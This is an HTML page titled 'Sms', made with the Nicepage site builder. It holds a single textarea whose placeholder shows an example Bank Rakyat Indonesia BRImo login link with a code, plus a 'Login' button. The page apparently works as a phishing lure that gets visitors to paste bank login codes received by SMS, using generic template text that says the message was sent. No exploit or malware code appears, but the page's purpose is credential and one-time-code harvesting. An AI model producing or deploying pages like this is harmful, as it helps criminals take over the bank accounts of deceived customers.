<!DOCTYPE html>
<html style="font-size: 16px;" lang="en"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="">
    <meta name="description" content="">
    <title>Sms</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="Sms.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery-1.9.1.min.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <meta name="generator" content="Nicepage 4.13.8, nicepage.com">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">
    
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "WebSite2391241"
}</script>
    <meta name="theme-color" content="#478ac9">
    <meta property="og:title" content="Sms">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
  </head>
  <body class="u-body u-overlap u-overlap-transparent u-xl-mode">
    <section class="u-align-center u-clearfix u-expanded-width u-palette-5-light-2 u-section-1" id="carousel_0eea">
      <div class="u-clearfix u-sheet u-sheet-1">
        <img class="u-image u-image-contain u-image-default u-image-1" src="/images/1657124265437.jpg" alt="" data-image-width="1378" data-image-height="1079">
        <div>
          <br>
          <br>
          <br>
        </div>
        <p></p>
        <div class="u-form u-form-1">
          <form action="#" method="POST" class="u-clearfix u-form-spacing-20 u-form-vertical u-inner-form" style="padding: 0px;" source="email" name="form">
            
            
            <div class="u-form-group u-form-textarea u-form-group-1">
              <label for="textarea-262a" class="u-form-control-hidden u-label"></label>
              <textarea rows="3" cols="50" id="textarea-262a" name="text" class="u-border-2 u-border-white u-input u-input-rectangle u-radius-4 u-white u-input-1" required="" placeholder="Conto : https://brimo.bri.co.id/app/login?code3dd1a86228261691e70f3fe"></textarea>
            </div>
            <div class="u-align-center u-form-group u-form-submit">
              <a href="#" class="u-active-palette-1-base u-border-2 u-border-white u-btn u-btn-round u-btn-submit u-button-style u-custom-color-1 u-hover-palette-1-light-1 u-radius-4 u-text-white u-btn-1">Login</a>
              <input type="submit" value="submit" class="u-form-control-hidden" wfd-invisible="true">
            </div>
            <div class="u-form-send-message u-form-send-success" wfd-invisible="true"> Thank you! Your message has been sent. </div>
            <div class="u-form-send-error u-form-send-message" wfd-invisible="true"> Unable to send your message. Please fix errors then try again. </div>
            <input type="hidden" value="" name="recaptchaResponse" wfd-invisible="true">
          </form>
        </div>
      </div>
    </section>
    
    
    
  
</body></html>